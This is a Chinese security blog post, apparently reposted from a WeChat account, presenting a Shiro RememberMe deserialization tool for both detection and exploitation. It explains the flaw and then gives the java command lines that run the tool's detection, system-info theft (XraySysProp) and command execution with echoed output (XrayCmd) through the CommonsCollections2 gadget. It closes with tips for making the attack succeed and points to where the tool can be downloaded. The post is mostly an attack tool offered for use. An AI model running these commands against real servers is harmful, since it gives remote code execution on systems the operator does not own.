shiro 不需要dnslog gadget的探测方式(附工具下载)

  • A+
所属分类:安全文章

前言

Shiro 是一个开源安全框架,提供身份验证授权密码学会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

Apache Shiro在用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。在调用反序列化时未进行任何过滤,导致可以触发远程代码执行漏洞。


changelog

  1. 新增shiro 检测方式(对,就是那个不需要gadget的检测方式)

检测

运行

java -cp .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc

shiro 不需要dnslog gadget的探测方式(附工具下载)

java -cp .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc
http://localhost:8080/samples_web_war/

shiro 不需要dnslog gadget的探测方式(附工具下载)

利用

支持shiro 16个key,支持攻击利用。支持的key与gadget以及攻击类型如下shiro 不需要dnslog gadget的探测方式(附工具下载)

查看目标服务器的系统信息

该攻击类型为XraySysProp,使用方法如下

java -jar .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XraySysProp

shiro 不需要dnslog gadget的探测方式(附工具下载)

利用截图如下

shiro 不需要dnslog gadget的探测方式(附工具下载)

执行命令并回显

该攻击类型为XrayCmd 使用方法如下

java -jar .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XrayCmd

利用截图如下shiro 不需要dnslog gadget的探测方式(附工具下载)

注意事项

  1. 建议删除不相关的http请求头,不然会因为http请求头过大而提示400错误

  2. 建议使用CommonsCollections2 gadget,体积小,利用率高

后台回复shiro 获取最新shiro利用/回显工具下载

后台回复source 获取该项目github地址

shiro 不需要dnslog gadget的探测方式(附工具下载)



本文始发于微信公众号(宽字节安全):shiro 不需要dnslog gadget的探测方式(附工具下载)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: